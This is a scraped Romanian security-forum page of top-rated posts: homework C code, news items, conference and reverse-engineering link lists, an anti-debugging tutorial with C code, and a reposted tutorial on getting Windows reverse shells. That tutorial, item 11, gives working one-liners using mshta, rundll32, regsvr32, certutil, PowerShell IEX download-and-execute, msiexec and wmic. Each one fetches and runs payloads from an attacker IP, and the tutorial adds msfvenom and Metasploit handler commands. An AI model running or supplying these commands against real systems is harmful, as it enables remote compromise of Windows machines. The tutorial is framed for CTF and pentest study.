Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/21/19 in all areas

  1. Toate la un gugal distanta: 1. Reverse string: #include <iostream> void reverseStringInPlace(std::string &stringToReverse) { int numCharacters = stringToReverse.length(); for (int i=0; i<numCharacters/2; i++) { std::swap(stringToReverse[i], stringToReverse[numCharacters-i-1]); } } int main() { std::string stringToReverse = "reversing a string"; std::cout << stringToReverse << std::endl; reverseStringInPlace(stringToReverse); std::cout << stringToReverse << std::endl; return 0; } 2. Factorial (recursive) int factorialfinder(int x) { if (x == 1) // HERE 5 is not equal to 1 so goes to else { return 1; }else { return x*factorialfinder(x-1); // returns 5*4*3*2*1 when x==1 it returns 1 } } 3. GCD (recursive) #include <iostream> using namespace std; int hcf(int n1, int n2); int main() { int n1, n2; cout << "Enter two positive integers: "; cin >> n1 >> n2; cout << "H.C.F of " << n1 << " & " << n2 << " is: " << hcf(n1, n2); return 0; } int hcf(int n1, int n2) { if (n2 != 0) return hcf(n2, n1 % n2); else return n1; } 4. n-th Fibo number #include<stdio.h> int fib(int n) { int f[n+1]; int i; f[0] = 0; f[1] = 1; for (i = 2; i <= n; i++) { f[i] = f[i-1] + f[i-2]; } return f[n]; } int main () { int n = 9; printf("%d", fib(n)); getchar(); return 0; } 5. Ackerman (recursive) #include <stdio.h> int ack(int m, int n) { if (m == 0) return n+1; if (n == 0) return ack( m - 1, 1 ); return ack( m - 1, ack( m, n - 1 ) ); } int main() { for (int i = 0; i < 6; ++i) for (int j = 0; j < 6; ++j) printf("ack(%d,%d) = %d\n", i, j, ack(i,j)); return 0; } La alea cu structuri de date mi-e lene sa caut, da' pula mea, mai fa si tu ceva.
    3 points
  2. A man has been charged with flying a drone near Heathrow Airport on 24 December. George Rusu is accused of using a drone on a field near the runway just days after a scare at Gatwick grounded more than 1,000 flights.... https://www.bbc.co.uk/news/uk-england-london-46935933 Bre, daca stiti ca aveti pitici pe creier, stati acasa, oricum geme tara de prosti, va puteti camufla bine acolo si nu va are nimeni treaba..
    3 points
  3. During the last two weeks of December, a security enthusiast who uses the online handle SandboxEscaper released details and proof-of-concept exploit code for two privilege escalation vulnerabilities in Windows. Researchers from ACROS Security have released a temporary “micropatch” for one of them through 0patch, a service that provides in-memory binary patching for zero-day flaws, and they are currently testing a patch for the secondary issue as well. One of SandboxEscaper’s vulnerabilities allows a low-privileged user to read any file on the system, including those belonging to other users. The exploit abuses a Windows feature called MsiAdvertiseProduct that performs operations with SYSTEM privileges, so it can lead to information disclosure, especially if attackers know the path to potentially sensitive files they can expose. The second vulnerability is even more serious and allows low-privileged users to overwrite arbitrary files as SYSTEM, potentially leading to arbitrary code execution with the highest possible privilege. This flaw has been dubbed the AngryPolarBearBug and is the one that 0patch.com has released a micropatch for. https://github.com/SandboxEscaper/randomrepo https://www.techcentral.ie/windows-zero-day-exploit-gets-temporary-micropatch/
    2 points
  4. Network scanning with nmap On 21 January 2019 By nytrosecurity Introduction First step in the process of penetration testing is “Information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While it might be different for the different type of penetration tests, such as web application or mobile application pentest, network scanning is a crucial step in the infrastructure or network pentest. Let’s take a simple scenario: you are a penetration tester and a company want to test one of its servers. They send you the IP address of the server. How to proceed? Although nmap allows to easily specify multiple IP targets or IP classes, to keep things simple, I will use a single target IP address which I have the permission to scan (my server): 137.74.202.89. Why? To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database. Articol complet: https://nytrosecurity.com/2019/01/21/network-scanning-with-nmap/
    2 points
  5. Nu cred ca-ti face nimeni tema, dar te poti uita peste asta: si asta: Ai explicatiile la vreo 4 probleme de-ale tale. Daca am inteles eu, intelege oricine.
    1 point
  6. https://kienmanowar.wordpress.com/tag/codebreakers/ Download links: https://mega.nz/#!W41EHBoL!xxs8KvIVqGhm-V1m7f3aHGXw8atkag9fmMxpVTNzDgY https://archive.org/search.php?query=subject%3A"CodeBreakers" CBJ_1_1_2004_Adding Imports by Hand.rar CBJ_1_1_2004_Dracon_Adding_functions_to_any_program_using_a_DLL.pdf CBJ_1_1_2004_Geddon_XP_SVCHOST_Reversed.pdf CBJ_1_1_2004_Opic_Introductory_Primer_To_Polymorphism.pdf CBJ_1_1_2004_Reverse_Engineering_the_Service_Control_Manager.pdf CBJ_1_1_2006_Abril_VX_Reversing_II.pdf CBJ_1_1_2007_Desnoyers_Tracing_for_Hardware.pdf CBJ_1_1_2007_Mokbel_RCE_Profiling_Counterbalancing_the_Algo.this.Key.zip CBJ_1_2_2004-Minesweeper Reversing.pdf CBJ_1_2_2004_Biv_Replication_from_data_files.pdf CBJ_1_2_2004_HolyFather_Hooking_Windows_API.pdf CBJ_1_2_2004_HolyFather_UnseenNT.pdf CBJ_1_2_2006_Kruse_Processless_Threads.pdf CBJ_1_2_Abril_AsProtected_Notepad.pdf CBJ_1_2_Abril_Unpacking_by_Code_Injection.pdf CBJ_2_1_2005_Abril_VX_Reversing_III.pdf CBJ_2_1_2005_Brulez_Scan33.zip CBJ_2_1_2005_Nigurrath_Oraculumn.zip CBJ_2_1_2005_Salihun_Embedded.pdf CBJ_2_1_2005_Wang_Crypto.pdf CBM_1_1_2006_Coding Smart and Dynamic Code.pdf CBM_1_2_2006_Beginners Guide to Basic Linux Anti Anti Debugging Techniques.pdf CBM_1_2_2006_Everything is Byte.pdf CBM_1_2_2006_Examining Viruses.pdf CBM_1_2_2006_Guide on how to play with processes memory.rar CBM_1_2_2006_How to Write Your Own Packer.pdf CBM_1_2_2006_Processless Applications.pdf CBM_1_2_2006_Reverse Engineering Backdoored Binaries.pdf CBM_1_2_2006_Reversing a Simple Virtual Machine.pdf CBM_1_2_2006_Self Modifying Code.pdf CBM_1_2_2006_Sharepad.pdf CBM_3_1_2006_Webbit_Keygen_Injection.zip Codebreakers-issue1-2003.zip Codebreakers-issue2-2003.zip
    1 point
  7. InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/cons/ https://infocon.hackingand.coffee/ https://github.com/PaulSec/awesome-sec-talks 2018 Conference Location Date OWASP BeNeLux Day (To fill in) 2018-11-30 BSides Lisbon (To fill in) 2018-11-29 Hack In The Box Dubai (To fill in) 2018-11-27 BSides Dubai (To fill in) 2018-11-27 IRISSCON (To fill in) 2018-11-22 GreHack (To fill in) 2018-11-16 Black Alps (To fill in) 2018-11-08 Pi And More (To fill in) 2018-11-03 PyCon.DE (To fill in) 2018-10-24 BSides Luxembourg (To fill in) 2018-10-19 Hack.lu (To fill in) 2018-10-16 MISP Summit (To fill in) 2018-10-15 BSides Warsaw (To fill in) 2018-10-12 OWASP NL Chapter Meetings (To fill in) 2018-09-27 BSides Belfast (To fill in) 2018-09-27 Hardwear.io (To fill in) 2018-09-13 Hack In The Box GSec (To fill in) 2018-08-30 BSides Manchester (To fill in) 2018-08-16 Haxogreen (To fill in) 2018-07-28 SteelCon (To fill in) 2018-07-07 OWASP NL Chapter Meetings (To fill in) 2018-06-28 Area41 (To fill in) 2018-06-15 TurkuSec (To fill in) 2018-05-24 Securi-Tay (To fill in) 2018-05-18 BSides Scotland (To fill in) 2018-04-27 Hack In The Box Amsterdam (To fill in) 2018-04-12 BSides Munich (To fill in) 2018-04-09 Insomni'hack (To fill in) 2018-03-22 BSides Ljubljana (To fill in) 2018-03-10 Nullcon (To fill in) 2018-03-01 Pi And More (To fill in) 2018-02-24 BSides Leeds (To fill in) 2018-01-26 NAVAJA NEGRA CONFERENCE Spain October 6th, 2018 RSA Conference 2018 San Francisco, USA March 4-8, 2018 Recon Brussels (slides) Brussels, Belgium Feb 2-4, 2018 2017 Conference Location Date Chaos Communication Congress 2017 (34C3) Leipzig, Germany Dec 27-30, 2017 BlackHat Europe 2017 London, UK Dec 4-7, 2017 ZeroNights 2017 (RU/EN slides) Moscow, Russia Nov 16-17, 2017 Wild West Hacking Fest Deadwood, USA Oct 24-28, 2017 ShellCon Los Angeles, USA Oct 19, 2017 Hack.lu Luxembourg Oct 17 - 19, 2017 HackIT 2017 (RU/EN slides) Kyiv, Ukraine Oct 7, 2017 BruCON 0x09 (slides) Gent Oct 2 - 4, 2017 BSides Augusta 2017 Augusta, USA Sep 16, 2017 BalCCon 2017 (2k17) Novi Sad, Vojvodina, Serbia Sep 15-17, 2017 R2Con 2017 (slides) Barcelona Sep 6 - 9, 2017 BSides Amsterdam 2017 Amsterdam Sep 1-2, 2017 HITCON 2017 (slides) Taiwan, TW Aug 25-26, 2017 HiTB 2017 (slides) Singapore Aug 21-27, 2017 SHA2017 Zeewolde, the Netherlands Aug 4 - 8, 2017 DefCon 25 (slides) Vegas, USA July 27-30, 2017 Black Hat 2017 (slides) Las Vegas Jul 22 - 27, 2017 Recon 2017 (slides) Montreal, Canada Jun 16-16, 2017 LevelUp 2017 Online Jul 15, 2017 SteelCon 2017 Sheffield, UK Jul 8 - 9, 2017 Camp++ 2017 Budapest, HU Jul 6 - 9, 2017 2017 RMLL Security Track (slides) Saint Etienne, France Jul 3 - 5, 2017 Neoquest 2017 (Russian only) Spb, Russia Jun 29, 2017 Hack in Paris 2017 Online Jun 27-Jul 1, 2017 RECON 2017 Montreal Jun 16 - 18, 2017 CircleCityCon 2017 Indianapolis, IN, USA Jun 9-11, 2017 NorthSec 2017 Montreal, Canada May 15 - 21, 2017 AppSecEU 2017 (slides) Belfast, Northern Ireland May 2-3, 2017 RuhrSec Day 1 Bochum, Germany May 2-3, 2017 RuhrSec Day 2 Bochum, Germany May 2-3, 2017 BSides Nashville Nashville, TN Apr 22, 2017 BSides Boston Boston, MA April 14-15, 2017 BSides AIDE Charleston, WV Apr 3-7, 2017 Cyphercon 2.0 MILWAUKEE, WI Mar 30-31, 2017 Black Hat Asia 2017 (slides) Marina Bay Sands, Singapore March 28-31, 2017 Bloomcon Bloomsburg, PA Mar 24-25, 2017 Insomni’hack (slides) Geneva, Switzerland Mar 23-24, 2017 Troopers17 IPv6 Track Breaking IoT Track Hands-On IoT Track Building IoT Track Special Track SAP Security Track Attack and Reasearch Track Defense & Management Track Heidelberg, Germany Mar 20-24, 2017 nullcon Goa 2017 Goa, India Mar 3-4, 2017 BSides NOVA Herndon, VA Feb 25, 2017 Securi-Tay 2017 Dundee, UK Feb 24, 2017 SecAppDev 2017 Leuven, Belgium Feb 19-23, 2017 RSA Conference 2017 San Francisco, CA Feb 13 - 17, 2017 BSides San Francisco 2017 San Francisco, CA Feb 12 - 13, 2017 Fosdem 2017 Brussels, Belgium Feb 4 - 5, 2017 Blue Hat IL Tel Aviv, Israel Jan 24 - 25, 2017 BSides Columbus 2017 Columbus, Ohio Jan 16, 2017 ShmooCon 2017 Washington, DC Jan 13 - 15, 2017
    1 point
  8. Am si eu nevoie de un cont , caut de ceva timp sa mai descarc cate ceva , daca mai faci rost de vreunul dami un PM , stai lin ca nu ii schimb parola ca bitangi astia hapsani repede or schimbat parola sa nu descarce si altu , doar ei sa il foloseasca
    1 point
  9. Top 10 web hacking techniques of 2018 - nominations open James Kettle | 03 January 2019 at 14:43 UTC Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases: Jan 1st: Start to collect community nominations Jan 21st: Launch community vote to build shortlist of top 15 Feb 11th: Panel vote on shortlist to select final top 10 Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17. Nominations so far Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts. How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog EdOverflow | An analysis of logic flaws in web-of-trust services. OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf Scratching the surface of host headers in Safari RCE by uploading a web.config – 003Random’s Blog Security: HTTP Smuggling, Apsis Pound load balancer | RBleug Piercing the Veil: Server Side Request Forgery to NIPRNet access inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra inputzero: An untold story of skype by microsoft | Dhiraj Mishra Neatly bypassing CSP – Wallarm Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf Beyond XSS: Edge Side Include Injection :: GoSecure GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution Logically Bypassing Browser Security Boundaries - Speaker Deck Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out Web Cache Deception Attack - YouTube Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user lanmaster53.com Beyond XSS: Edge Side Include Injection :: GoSecure Scratching the surface of host headers in Safari #309531 Stored XSS in Snapmatic + R★Editor comments InsertScript: Adobe Reader PDF - Client Side Request Injection $36k Google App Engine RCE - Ezequiel Pereira MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox #341876 SSRF in Exchange leads to ROOT access in all instances reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho Data Exfiltration via Formula Injection #Part1 Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog Evading CSP with DOM-based dangling markup | Blog Save Your Cloud: DoS on VMs in OpenNebula 4.6.1 CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium Practical Web Cache Poisoning | Blog #317476 Account Takeover in Periscope TV A timing attack with CSS selectors and Javascript VPN Extensions are not for privacy Exposing Intranets with reliable Browser-based Port scanning | Blog Exploiting XXE with local DTD files A story of the passive aggressive sysadmin of AEM - Speaker Deck Hunting for security bugs in AEM webapps - Speaker Deck ASP.NET resource files (.RESX) and deserialisation issues Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste! cat ~/footstep.ninja/blog.txt Blog - RCE due to ShowExceptions MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution Blog on Gopherus Tool DNS Rebinding Headless Browsers It's A PHP Unserialization Vulnerability Jim But Not As We Know It James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
    1 point
  10. Anti Debugging Tricks #4 – Hidden Threads timb3r - reverse engineering January 19, 2019No Comments ANTIDEBUG CRASH HIDE FROM DEBUGGER NTSETINFORMATIONTHREAD THREADS Has this ever happened to you? You’re playing around with some application and and it crashes the moment you attach a debugger? Ever wondered why or how? I do. These types of questions keep me awake at night. I first became aware of this technique while cruising around some forums on the internet. People typically asking for a bypass or a method to work around it. But I was more interested in HOW this technique works less interested in how to bypass. During my research phase I noticed that after the application crashed out it would crash out with: Unhandled exception code 80000003 But that’s an int 3 exception? How is the Debugger not catching that? What the actual hell. Searching around for information I discovered that NtSetInformationThread has a parameter called THREADINFOCLASS. Which contains this interesting snippet: ThreadHideFromDebugger = 0x11 Why Hans? You may be wondering why this is even a ‘feature’ of Windows? Wouldn’t malware abuse the hell out of this? Yes, probably. But here’s why it exists: When you attach a debugger to a remote process a new thread is created. If this was just a normal thread the debugger would be caught in an endless loop as it attempted to stop it’s own execution. So behind the scenes when the debugging thread is created Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged and a deadlock prevented. Allowing code execution to continue as normal. However, now that this thread is hidden from the debugger any breakpoints or exceptions that are triggered will cause the process to crash. Due to the fact that the debugger cannot see this thread it’s now unable to trap these events. So as it turned out some devious individual noticed this odd behaviour and thought: “this would make a really cool anti-debug feature”. Now we’re here with this method widespread enough for me to be aware of it. Das Kode So what’s it actually look like in code? I wasn’t able find any live examples so I constructed my own based on how I thought it should work: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 #include <stdio.h> #include <windows.h> enum THREADINFOCLASS { ThreadHideFromDebugger = 0x11 }; typedef NTSTATUS (WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG); typedef NTSTATUS (WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG); NtQueryInformationThread_t fnNtQueryInformationThread = NULL; NtSetInformationThread_t fnNtSetInformationThread = NULL; DWORD WINAPI ThreadMain(LPVOID p) { while(1) { // This can be any trigger we're using this demo purposes if(IsDebuggerPresent()) // For MingW replace with __asm { int 3; } on MSVC asm("int3"); Sleep(500); } return 0; } int main(void) { DWORD dwThreadId = 0; HANDLE hThread = CreateThread(NULL, 0, ThreadMain, NULL, 0, &amp;dwThreadId); HMODULE hDLL = LoadLibrary("ntdll.dll"); if(!hDLL) return -1; fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread"); fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread"); if(!fnNtQueryInformationThread || !fnNtSetInformationThread) return -1; ULONG lHideThread = 1, lRet = 0; fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread)); fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread), &amp;lRet); printf("Thread is hidden: %s\n", val ? "Yes" : "No"); WaitForSingleObject(hThread, INFINITE); return 0; } Pretty simple yes? Now if you run the program and attempt to attach a debugger you’ll get this interesting crash: 0036:err:seh:raise_exception Unhandled exception code 80000003 flags 0 addr 0x401566 Oh ho ho! Poor Tony Throwing Hans off Nakatomi Well now we’ve established how this works we can look at beating it. There’s a number of ways including: Hooking the required Nt Function calls. Replacing the int 3 instruction with a nop. Nopping or hooking the “trigger” function. I opted for nopping out int 3: You can use your tool of choice to locate the required int 3 instruction: You’ll have to search around a bit Here’s our thread with the check Now we can nop that sucka out Attaching a debugger and resuming execution will result in everything working as expected. Bye Hans Ho-ho-ho One Time Donation: BTC 1DXcjix3FmcHYezFAjCrpzZA9FkbSC971e Paypal PayPal.me/timb3r Monthly Donation: Patreon Sursa: https://gamephreakers.com/2019/01/anti-debugging-tricks-4-hidden-threads/
    1 point
  11. Get Reverse-shell via Windows one-liner posted inPENETRATION TESTING on JANUARY 20, 2019 by RAJ CHANDEL SHARE This article will help those who play with CTF challenges, because today we will discuss “Windows One- Liner” to use malicious commands such as power shell or rundll32 to get reverse shell of the Windows system. Generally, while abusing HTTP services or other programs, we get RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to use the target machine to get reverse connections. Table of Content Mshta.exe Launch HTA attack via HTA Web Server of Metasploit Rundll32.exe Launch Rundll32 Attack via SMB Delivery of Metasploit Regsvr32.exe Launch Regsvr32 via Script Web Delivery of Metasploit Certutil.exe Launch MSbuild Attack via Msfvenom C# shellcode Powershell.exe Launch Powercat attack via Powershell Launch cscript.exe via Powershell Launch Batch File Attack via Powershell Msiexec.exe Launch msiexec attack via msfvenom Wmic.exe Launch Wmic.exe attack via Koadic Mshta.exe Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool. Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. 1 2 3 4 use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit Now run the malicious code through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain meterpreter sessions. Once you will execute the malicious hta file on the remote machine with the help of mshta.exe, you get reverse connection at your local machine (Kali Linux). 1 mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta As you can observe that, we have meterpreter session of the victim as shown below: Rundll32.exe Rundll32.exe is associated with Windows Operating System that allow you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries. Launch Rundll32 Attack via SMB Delivery of Metasploit Metasploit also contain “SMB Delivery” module which generate malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell. 1 2 3 use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions. Once you will execute the dll file on remote machine with the help of rundll32.exe, you will get reverse connection at your local machine (Kali Linux). 1 rundll3.exe \\192.168.1.109\vabFG\test.dll,0 As you can observe that, we have meterpreter session of the victim as shown below: Regsvr32.exe Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows. RegSvr32.exe has the following command-line options: Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname> /u – Unregister server /i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall /n – do not call DllRegisterServer; this option must be used with /i /s – Silent; display no message boxes Launch Regsvr32 via Script Web Delivery of Metasploit This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection. Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. 1 2 3 4 5 6 use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit Copy the highlighted text shown in below window Once you will execute the scrobj.dll file on remote machine with the help of regsrv32.exe, you will get reverse connection at your local machine (Kali Linux). 1 regsvr32 /s /n /u /i:http://192.168.1.109:8080/xt5dIF.sct scrobj.dll As you can observe that, we have meterpreter session of the victim as shown below: Certutil.exe Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get meterpreter session. Launch certutil Attack via Msfvenom Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get reverser shell of victim’s machine. 1 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe Now, in order to dump configuration information or files of shell.exe file with certutil, you can follow below systax: Syntax: [-f] [-urlcache] [-split] Path of executable file 1 certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Powershell.exe You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from official website of Microsoft Windows from here. Launch Powercat attack via Powershell Powercat is a PowerShell native backdoor listener and reverse shell also known as modify version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and also has a client- to- client relay, a term for Powercat client that allows two separate listeners to be connected. Download powershell in your local machine and then the powercat.ps1 transfer files with python http server to obtain reverse shell of the target as shown below and start netcat listener. 1 2 git clone https://github.com/besimorhino/powercat.git python -m SimpleHTTPServer 80 Then execute following command on remote side to get natcat session. 1 powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd" As you can observe that, we have netcat session of the victim as shown below: Batch File Similarly, powershell allows client to execute bat file, therefore let’s generate malicious bat file with msfvenom as given below and start netcat listener. 1 msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat Then execute following command on remote side to get natcat session. 1 powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat')) As you can observe that, we have netcat session of the victim as shown below: Cscript Similarly, powershell allows client to execute cscript.exe to run wsf, js and vbs script, therefore let’s generate malicious bat file with msfvenom as given below and start multi/handler as listener. 1 msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs Then execute following command on remote side to get meterpreter session. 1 powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Msiexec.exe As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe. Launch msiexec attack via msfvenom Let’s generate a MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as listener. 1 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi Once you will execute the 1.msi file on remote machine with the help of msiexec, you will get reverse connection at your local machine (Kali Linux). 1 msiexec /q /i http://192.168.1.109/1.msi 1 2 3 4 5 use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit As you can observe that, we have meterpreter session of the victim as shown below: Wmic.exe The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language). Launch Wmic.exe attack via Koadic Now will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire. To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/ Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home. 1 2 3 use stager/js/wmic set SRVHOST 192.168.1.107 run Execute WMIC following command to download and run the malicious XSL file from a remote server: 1 wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl" Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Sursa: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
    1 point
  12. la ora asta ne urezi o zi frumoasa ?
    1 point
  13. 1 point
  14. Inainte de a te apuca de treaba, ia in considerare astea: O afacere nu se face prin spam. Citeste CAN-SPAM Act Cauta un om care stie cum sa faca marketing
    1 point
  15. Recomand: https://docs.microsoft.com/en-us/sysinternals/downloads/strings
    1 point
  16. Cont cu ajutorul caruia sa-si faca rezervare la ma-sa.
    1 point
  17. E unini-directional, si omni-directional, bla bla bla, imi este lene Off: dude.. http://www.deveregroupscam.com/encrypted-satellite-calls-cracked-in-milliseconds/
    1 point
